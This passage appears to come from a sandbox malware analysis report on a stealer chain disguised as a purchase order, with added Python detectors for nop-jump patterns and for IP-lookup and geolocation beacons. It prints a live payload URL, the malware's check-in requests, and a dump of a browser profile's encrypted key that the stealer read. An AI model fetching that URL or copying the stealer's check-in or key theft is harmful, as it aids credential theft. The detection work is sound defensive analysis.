                           Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h | 5_2_02B07E60
                           Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Code function: 4x nop then jmp 02B077E4h | 5_2_02B07580
                           Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h | 5_2_02B07E58
                           Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 4x nop then jmp 00EA9731h | 6_2_00EA9480
                           Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 4x nop then jmp 00EA9E5Ah | 6_2_00EA9A30
                           Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 4x nop then jmp 00EA9E5Ah | 6_2_00EA9D87
                           Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 4x nop then jmp 0521873Bh | 6_2_05218400
                           Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 4x nop then jmp 0521799Fh | 6_2_052176F8
                           Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 4x nop then jmp 0521A3A7h | 6_2_0521A100
                           Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 4x nop then jmp 0521969Fh | 6_2_052193F8
                           Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 4x nop then jmp 05217547h | 6_2_052172A0
                           Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 4x nop then jmp 05219F4Fh | 6_2_05219CA8
                           Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 4x nop then jmp 05219247h | 6_2_05218FA0
                           Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 4x nop then jmp 0521824Fh | 6_2_05217FA8
                           Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 4x nop then jmp 052170EFh | 6_2_05216E48
                           Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 4x nop then jmp 05219AF7h | 6_2_05219850
                           Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 4x nop then jmp 05218DEFh | 6_2_05218B48
                           Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 4x nop then jmp 05217DF7h | 6_2_05217B50
                           Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 4x nop then mov esp, ebp | 6_2_05216BB0
                           Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 4x nop then mov esp, ebp | 6_2_05216BC0
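The rows above are byte-pattern hits: four consecutive single-byte nops (0x90) immediately followed by a jmp or a mov, reported with the function's start address and the decoded target of the jump. The scanner below is an added example written for this page, not Joe Sandbox's signature code. The byte buffer and its base address are constructed; the first rel32 is chosen so the scan reproduces the reported "jmp 0521873Bh" for function 6_2_05218400, and the buffer also contains 3-nop and 5-nop runs to show that the label counts the run exactly.

```python
"""Scan a code buffer for the '4x nop then <insn>' pattern listed in the report.
Added example for this page (not Joe Sandbox's code). SAMPLE_CODE and BASE are
constructed; only the first jmp target is chosen to match a reported value."""
from __future__ import annotations
import struct

NOP = 0x90


def decode_after_nops(buf: bytes, pos: int, base: int) -> str | None:
    """Text form of the instruction at buf[pos], for the opcodes that occur in the
    report's hits (jmp rel8/rel32, mov esp/ebp, mov dword ptr [ebp+disp8], imm32).
    Returns None for anything else, so unknown bytes after a nop run are ignored."""
    op = buf[pos]
    if op == 0xEB and pos + 2 <= len(buf):                      # jmp rel8
        rel = struct.unpack_from("<b", buf, pos + 1)[0]
        return f"jmp {(base + pos + 2 + rel) & 0xFFFFFFFF:08X}h"
    if op == 0xE9 and pos + 5 <= len(buf):                      # jmp rel32
        rel = struct.unpack_from("<i", buf, pos + 1)[0]
        return f"jmp {(base + pos + 5 + rel) & 0xFFFFFFFF:08X}h"
    if buf[pos:pos + 2] == b"\x8B\xEC":                         # mov ebp, esp
        return "mov ebp, esp"
    if buf[pos:pos + 2] == b"\x8B\xE5":                         # mov esp, ebp
        return "mov esp, ebp"
    if buf[pos:pos + 2] == b"\xC7\x45" and pos + 7 <= len(buf):  # mov dword ptr [ebp+disp8], imm32
        disp = struct.unpack_from("<b", buf, pos + 2)[0]
        imm = struct.unpack_from("<I", buf, pos + 3)[0]
        sign = "-" if disp < 0 else "+"
        return f"mov dword ptr [ebp{sign}{abs(disp):X}h], {imm:08X}h"
    return None


def find_nop_then(buf: bytes, base: int, count: int = 4) -> list[tuple[int, str]]:
    """Return (address, label) for every run of exactly `count` nops that is followed
    by an instruction decode_after_nops() understands. Runs of another length are
    skipped on purpose: the report labels the run length ('4x nop'), so a 5-nop run
    would be a different signature string."""
    hits: list[tuple[int, str]] = []
    i, n = 0, len(buf)
    while i < n:
        if buf[i] != NOP:
            i += 1
            continue
        j = i
        while j < n and buf[j] == NOP:
            j += 1
        if j - i == count and j < n:
            text = decode_after_nops(buf, j, base)
            if text:
                hits.append((base + i, f"{count}x nop then {text}"))
        i = j
    return hits


# Constructed sample laid out at the reported function address 6_2_05218400.
BASE = 0x05218400
SAMPLE_CODE = (
    b"\x55\x8B\xEC" + b"\xCC" * 13                      # push ebp; mov ebp, esp; int3 padding to +0x10
    + b"\x90" * 4 + b"\xE9\x22\x03\x00\x00"              # +0x10: 4x nop; jmp rel32 -> 0521873Bh
    + b"\x90" * 4 + b"\xC7\x45\xE4\x00\x00\x00\x00"      # +0x19: 4x nop; mov dword ptr [ebp-1Ch], 0
    + b"\x90" * 3 + b"\xEB\x05"                          # +0x24: only 3 nops, not a 4x hit
    + b"\x90" * 4 + b"\x8B\xE5"                          # +0x29: 4x nop; mov esp, ebp
    + b"\x90" * 5 + b"\xEB\x00"                          # +0x2F: 5 nops, not an exact 4x run
    + b"\xC3"                                            # ret
)

if __name__ == "__main__":
    for addr, label in find_nop_then(SAMPLE_CODE, BASE):
        print(f"{addr:08X}  {label}")
```

The jump target is resolved the way the report prints it: address of the byte after the jmp plus the signed displacement. Note that the hit addresses in the rows above (0x02Bxxxxx for Trading_AIBot.exe, 0x00EAxxxx and 0x0521xxxx for Microsofts.exe) are in dynamically allocated memory rather than in a PE image section, which fits JIT-compiled .NET code; the pattern is a supporting observation, not a verdict on its own.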

                          Networking

                           Source: Malware configuration extractor | URLs: https://lwaziacademy.com/wps/200_Oupzhkprnvw
                           Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: 0_2_02DEE2F0 InternetCheckConnectionA | 0_2_02DEE2F0
                           Source: global traffic | HTTP traffic detected: GET /xml/102.129.153.238 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
                           Source: Joe Sandbox View | IP Address: 132.226.8.169
                           Source: Joe Sandbox View | ASN Name: GridhostZA
                           Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                           Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                           Source: unknown | DNS query: name: checkip.dyndns.org
                           Source: unknown | DNS query: name: reallyfreegeoip.org
                           Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49747 -> 41.185.8.252:443
                           Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.20:49748 -> 132.226.8.169:80
                           Source: global traffic | HTTP traffic detected: GET /wps/200_Oupzhkprnvw HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: lwaziacademy.com
                           Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                           Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
                           Source: unknown | HTTPS traffic detected: 104.21.67.152:443 -> 192.168.11.20:49749 version: TLS 1.0
                           Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                           Source: unknown | UDP traffic detected without corresponding DNS query: 9.9.9.9
                           Source: unknown | UDP traffic detected without corresponding DNS query: 9.9.9.9
                           Source: unknown | UDP traffic detected without corresponding DNS query: 9.9.9.9
                           Source: global traffic | HTTP traffic detected: GET /wps/200_Oupzhkprnvw HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: lwaziacademy.com
                           Source: global traffic | HTTP traffic detected: GET /xml/102.129.153.238 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
                           Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                           Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
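The HTTP rows above carry two separate fingerprints. The fetch of /wps/200_Oupzhkprnvw from lwaziacademy.com (the URL the configuration extractor recovered) uses the default user agent of the WinHttp.WinHttpRequest COM object, i.e. it was issued from script or loader code rather than a browser. The checkip.dyndns.org and reallyfreegeoip.org requests use an IE6 / .NET CLR 1.0 user agent, and the second puts the victim's public IP (102.129.153.238 in this run) into the URL path, the classic "learn my IP, then geolocate it" check-in of the keylogger stage. The following detection logic is an added example written for this page, not Joe Sandbox or Suricata code; the request texts are reconstructed from the rows above with their CRLFs restored, plus one benign request as a control.

```python
"""Tag the stage fetch and the external-IP / geolocation beacons listed in the report.
Added example for this page (not Joe Sandbox or Suricata logic). REQUESTS is
constructed from the report's rows with CRLFs restored; it is not a capture."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Public "what is my IP" / geolocation services the sample contacts in this report
IP_LOOKUP_HOSTS = {"checkip.dyndns.org", "checkip.dyndns.com", "reallyfreegeoip.org"}
# User agent of the keylogger stage as captured here (IE6 / .NET CLR 1.0 string,
# with or without the space before the version)
LEGACY_DOTNET_UA = re.compile(r"MSIE 6\.0; Windows NT 5\.2; \.NET CLR ?1\.0\.3705")
# Default user agent of the WinHttp.WinHttpRequest COM object (script/loader fetches)
WINHTTP_COM_UA = re.compile(r"WinHttp\.WinHttpRequest\.\d+")
# reallyfreegeoip.org path that embeds the caller's own public IPv4 address
GEOIP_PATH = re.compile(r"/xml/(\d{1,3}(?:\.\d{1,3}){3})")


@dataclass
class HttpRequest:
    method: str
    path: str
    headers: dict[str, str] = field(default_factory=dict)


def parse_request(raw: str) -> HttpRequest:
    """Minimal HTTP/1.x request parser: request line plus headers, body ignored."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    req = HttpRequest(method, path)
    for line in lines[1:]:
        name, _, value = line.partition(":")
        req.headers[name.strip().lower()] = value.strip()
    return req


def classify(req: HttpRequest) -> list[str]:
    """Return the tags that apply to one request, in a fixed order."""
    host = req.headers.get("host", "").lower()
    ua = req.headers.get("user-agent", "")
    tags: list[str] = []
    if host in IP_LOOKUP_HOSTS:
        tags.append("ip_lookup")
    if LEGACY_DOTNET_UA.search(ua):
        tags.append("legacy_dotnet_ua")
    if WINHTTP_COM_UA.search(ua):
        tags.append("winhttp_com_ua")
    if host == "reallyfreegeoip.org" and GEOIP_PATH.fullmatch(req.path):
        tags.append("geoip_self_lookup")
    return tags


def triage(raw_requests: list[str]) -> dict:
    """Tag every request and derive what an analyst wants from the set: the victim's
    public IP (leaked in the geoip path), the first script-driven fetch (host, path),
    and whether an IP lookup was followed by a geolocation of that IP."""
    result: dict = {"tags": [], "public_ip": None, "stage_fetch": None,
                    "verdict": "no stealer check-in pattern"}
    saw_ip_lookup = saw_geoip = False
    for raw in raw_requests:
        req = parse_request(raw)
        tags = classify(req)
        result["tags"].append(tags)
        if "geoip_self_lookup" in tags:
            result["public_ip"] = GEOIP_PATH.fullmatch(req.path).group(1)
            saw_geoip = True
        elif "ip_lookup" in tags:
            saw_ip_lookup = True
        if "winhttp_com_ua" in tags and result["stage_fetch"] is None:
            result["stage_fetch"] = (req.headers.get("host", ""), req.path)
    if saw_ip_lookup and saw_geoip:
        result["verdict"] = "external-ip-then-geoip (stealer check-in pattern)"
    return result


# Constructed from the requests the report lists (CRLFs restored); the last is a control.
REQUESTS = [
    "GET /wps/200_Oupzhkprnvw HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\n"
    "User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)\r\n"
    "Host: lwaziacademy.com\r\n\r\n",
    "GET / HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; "
    ".NET CLR1.0.3705;)\r\nHost: checkip.dyndns.org\r\nConnection: Keep-Alive\r\n\r\n",
    "GET /xml/102.129.153.238 HTTP/1.1\r\nHost: reallyfreegeoip.org\r\nConnection: Keep-Alive\r\n\r\n",
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
]

if __name__ == "__main__":
    summary = triage(REQUESTS)
    for raw, tags in zip(REQUESTS, summary["tags"]):
        print(raw.split("\r\n")[0], "->", tags or "benign")
    print("public IP:", summary["public_ip"], "| stage fetch:", summary["stage_fetch"])
    print("verdict:", summary["verdict"])
```

The logic keys on Host and User-Agent only, so it applies equally to a proxy log and to a pcap; the Suricata hit 2803274 above fires on the header layout of the same download flow, which these rules do not depend on. Note that the geoip request reveals the victim's public address in the clear, which is a useful pivot when hunting across hosts.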
                           Source: Microsofts.exe, 00000006.00000002.24180228176.0000000002DA8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: ","type":"MediaFoundationOptIn"},{"name":"OptOut","type":"MediaFoundationOptOut"}],"version":1},"web_notification_override":{"applications":[{"applied_policy":"prompt","domain":"www.reddit.com"},{"applied_policy":"prompt","domain":"www.telegraphindia.com"},{"applied_policy":"prompt","domain":"timesofindia.indiatimes.com"},{"applied_policy":"prompt","domain":"pushengage.com"},{"applied_policy":"prompt","domain":"www.timesnownews.com"},{"applied_policy":"prompt","domain":"www.couponrani.com"},{"applied_policy":"prompt","domain":"www.wholesomeyum.com"},{"applied_policy":"prompt","domain":"www.asklaila.com"},{"applied_policy":"prompt","domain":"www.sammobile.com"},{"applied_policy":"prompt","domain":"www.ecuavisa.com"},{"applied_policy":"prompt","domain":"uz.sputniknews.ru"},{"applied_policy":"prompt","domain":"www.ndtv.com"},{"applied_policy":"prompt","domain":"www.elimparcial.com"},{"applied_policy":"prompt","domain":"www.povarenok.ru"},{"applied_policy":"prompt","domain":"www.estadao.com.br"},{"applied_policy":"prompt","domain":"olxpakistan.os.tc"},{"applied_policy":"prompt","domain":"televisa.com"},{"applied_policy":"prompt","domain":"uol.com.br"},{"applied_policy":"prompt","domain":"www.axisbank.com"},{"applied_policy":"prompt","domain":"mutualfund.adityabirlacapital.com"},{"applied_policy":"prompt","domain":"www.facebook.com"},{"applied_policy":"prompt","domain":"www.instagram.com"},{"applied_policy":"prompt","domain":"www.messenger.com"}],"policies":[{"name":"prompt","reason":"","type":"","value":""}],"version":1}},"fre":{"autoimport_spartan_visible_item_completed":true,"oem_bookmarks_set":true,"should_user_see_fre_banner":"C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default"},"hardware_acceleration_mode_previous":true,"is_dsp_recommended":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"Default":{"migration_attempt":0,"migration_version":4},"last_edgeuwp_pin_migration_on_edge_version":"94.0.992.31","last_edgeuwp_pin_migration_on_os_version":"10 Version 20H2 (Build 19042.1165)","last_edgeuwp_pin_migration_success":false},"network_primary_browser":{"browser_name_enum":1,"last_computed_time":"13276780388565220","network_usage":{"browser_with_highest_network_usage":1,"browsers_usage":{"1":100.0},"ie":0}},"network_time":{"network_time_mapping":{"local":1.691263997088662e+12,"network":1.691260396e+12,"ticks":126914944.0,"uncertainty":1220870.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAAb7qWBj3YRSZSg2yN3JOzDEAAAAAoAAABFAGQAZwBlAAAAEGYAAAABAAAgAAAAcjDYF/dB+Ehkggnbhv5UEmuk4qMrV300v/DxeYPr2kcAAAAADoAAAAACAAAgAAAA4Fc7bPPxg5D3HUrv9FeO3M8NoHE1hRCd1+t1vMyMeGIwAAAA60sl/pIpVYUn/pFhWuHqOweLytcqg8K9+apLINEdcjv+lt8eT+qH7hjP4LZPc65wQAAAABgU4kp6fr9r5p49VZoKZkZbDP1PXsAR/6XYDO+DikEUGEeRYwj0k5LNwmmr0tZ5hKexU3XBg6oVvPcKgnBt6go="},"policy":{"last_statistics_update":"13335737596278882"},"profile":{"info_cache":{"Default":{"active_time":1691263997.009407,"avatar_icon":"chrome://theme/IDR_PROFILE_AVATAR_20",
                           Source: global traffic | DNS traffic detected: DNS query: lwaziacademy.com
                           Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
                           Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
                           Source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962479852.0000000021C75000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23075899157.0000000021520000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23137306442.00000000007C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                           Source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962479852.0000000021C75000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23075899157.0000000021520000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23137306442.00000000007C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                           Source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962479852.0000000021C75000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23075899157.0000000021520000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23137306442.00000000007C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                           Source: Microsofts.exe, 00000006.00000002.24180228176.0000000002CDF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.com
                           Source: Microsofts.exe, 00000006.00000002.24180228176.0000000002CDF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.comd
                           Source: Microsofts.exe, 00000006.00000002.24180228176.0000000002CDF000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000006.00000002.24180228176.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
                           Source: Microsofts.exe, 00000006.00000002.24180228176.0000000002C61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
                           Source: Microsofts.exe, 00000006.00000002.24180228176.0000000002CDF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/d
                           Source: Microsofts.exe, 00000006.00000000.22971337611.0000000000802000.00000002.00000001.01000000.0000000B.sdmp, Microsofts.exe.4.dr | String found in binary or memory: http://checkip.dyndns.org/q
                           Source: Microsofts.exe, 00000006.00000002.24180228176.0000000002CDF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.orgd
                           Source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962479852.0000000021C75000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23075899157.0000000021520000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23137306442.00000000007C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                           Source: PO_B2W984.com, 00000000.00000002.22965692413.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, Microsofts.exe, 00000006.00000002.24170624386.0000000000F92000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.23004693323.0000000002F06000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                           Source: PO_B2W984.com, 00000000.00000003.22961850687.0000000022891000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962642028.000000007E75A000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000002.23155674229.0000000020D19000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
                           Source: PO_B2W984.com, 00000000.00000002.22965692413.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, Microsofts.exe, 00000006.00000002.24170624386.0000000000F92000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.23004693323.0000000002F06000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                           Source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962479852.0000000021C75000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23075899157.0000000021520000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23137306442.00000000007C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                           Source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962479852.0000000021C75000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23075899157.0000000021520000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23137306442.00000000007C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                           Source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962479852.0000000021C75000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23075899157.0000000021520000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23137306442.00000000007C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: 